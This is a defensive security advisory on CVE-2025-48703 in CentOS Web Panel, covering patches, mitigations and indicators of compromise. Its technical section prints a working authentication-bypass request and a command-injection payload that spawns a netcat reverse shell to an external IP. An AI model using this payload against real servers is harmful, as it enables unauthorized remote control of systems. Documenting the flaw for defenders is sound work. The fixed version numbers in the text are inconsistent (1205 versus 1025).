Executive Summary

    On November 4th, the Cybersecurity and Infrastructure Security Agency (CISA) added a critical vulnerability within CentOS Web Panel (CWP) to its known exploited vulnerabilities (KEV) database, meaning it is being actively exploited in the wild.

    CWP is a web-based utility leveraged by administrators to manage Linux servers and underlying network services and has broad exposure on the internet. The flaw within this utility is officially tracked as CVE-2025-48703 and allows an unauthenticated attacker with knowledge of a valid non-root username to compromise the hosting server, potentially giving them full control of the system.

    At the time of this advisory, CISA has not publicly disclosed details about how the vulnerability is being exploited in the wild. However, with disclosure of the proof of concept (PoC) and ease of exploitation, Beazley Security recommends that affected organizations immediately apply the latest security patches and review vulnerable systems for any signs of compromise.

    Affected Systems or Products

    CentOS Web Panel versions prior to 0.9.8.1025 are vulnerable to authentication bypass and remote code execution attacks. Please see the table below and Mitigations section for guidance on how to reduce the risk of this vulnerability.

    Software

    Affected Versions

    Fixed Versions

    CentOS Web Panel

    < 0.9.8.1025

    0.9.8.1205 or later

    Mitigations / Workarounds

    Beazley Security strongly recommends affected organizations upgrade CWP to versions 0.9.8.1205 or later. If patching cannot be immediately performed, the following steps may help to reduce risk:

    • Restrict network access of CWP interfaces to trusted management networks. These are typically served on ports 2083 (user panel) and 2087 (admin panel), but specific deployments and configurations should be reviewed for accuracy.

    • Deploy the panel behind web application firewalls (WAF) and configure them to detect or block post requests containing unexpected t_total parameters. See the Technical Details section of this report for more information.

    • Review authentication logs, web access logs, and outbound network activity from the server for indicators of exploitation.

    Patches

    The vendor has addressed this vulnerability in CWP versions 0.9.8.1205 or later, and the CWP changelog can be followed here to watch for future update announcements.

    According to the CWP update wiki, CWP has an automatic update routine performed via crontab that could take up to 48 hours to update. System administrators can obtain the fixed build by running built-in update commands on the server or attempting the following command from the CWP update wiki:

    sh /usr/local/cwpsrv/htdocs/resources/scripts/update_cwp

    OR

    sh /scripts/update_cwp

    Affected organizations should restart CWP services after update commands are run to ensure no legacy instances of the panel are still running.

    Indicators of Compromise

    Although CISA has not released the specifics of this attack or how the vulnerability is being exploited, the following steps can be taken to identify indicators of attack or compromise:

    Check CWP Web Access Logs:

    • Review for suspicious posts to the filemanager module, especially missing authentication.

    • Review for posts that leverage unexpected, non-numeric t_total values, such as other shell commands like nc, or curl. See the Technical Details section for more information.

    Review System Activity:

    • Unexpected execution of chmod, bash, curl, wget, or nc (netcat) originating from the CWP web process user.

    • Unusual outbound network connections to external IPs or high numbered (ephemeral) ports that could indicate reverse shell activity.

    • Newly created and modified files within home directories of CWP users on the system, or evidence of downloaded payloads and binaries into these directories.

    Technical Details

    CWP provides an interface for tooling that can be used to manage hosting environments without the need to directly access server configurations at an OS level, and is often exposed to the internet for consumer accessibility.

    The vulnerability found in CWP is due to an authentication bypass within a user panel in the software. Specifically, the flaw documented by fenrisk is due to a problem within the file manager capability that allows a user to set read, write, and execute permissions for a file, which on the backend leverages the OS-level chmod utility to make changes. It was discovered that if an attacker knows or can guess a valid non-root username, the endpoint the CWP file manager uses to alter permissions on the server lacks verification of user authentication. The following request is an example from fenrisk that bypasses authentication in vulnerable versions of the software: 

    curl -kis 'https://127.0.0.1:2083/<user>/index.php?module=filemanager&acc=changePerm' --data 'fileName=.bashrc&currentPath=/home/<user>/&t_total=644'

    In the example above, the t_total parameter is leveraged to set the numeric file permission schema from the CWP file manager, expected by chmod on the server side. Building on the above authentication bypass finding, remote code execution can be achieved due to a sanitization flaw within the t_total parameter. The exploitation is illustrated below, which results in calling netcat to attempt an outbound shell:

    $ curl -kis 'https://127.0.0.1:52083/myuser/index.php?module=filemanager&acc=changePerm' --data 'fileName=.bashrc&currentPath=/home/myuser&t_total=`nc 1.2.3.4 9999 -e /bin/bash`'

    If successful, the attacker could compromise the server and achieve a remote shell or build on this PoC to invoke the server to download malicious payloads.

    Fenrisk’s public PoC code was released in June 2025, and CISA’s recent KEV listing signals that threat actors are now actively leveraging the flaw to gain remote access to vulnerable CWP deployments.

    Beazley Security’s exposure management data revealed widespread usage of the web panel exposed across the internet. Given the ease of exploitation, exposure, and confirmed in-the-wild activity, affected organizations should ensure they've upgraded to software versions 0.9.8.1025 or later.

    How Beazley Security is responding

    Beazley Security is monitoring client perimeter devices through our Exposure Management Platform to identify impacted devices and support organizations in remediation of any issues found.

    We are also conducting threat hunts across our MDR environment to detect potential exploitation attempts against our clients.

    If you believe your organization may have been impacted by this attack campaign and need support, please contact our Incident Response team.

    Sources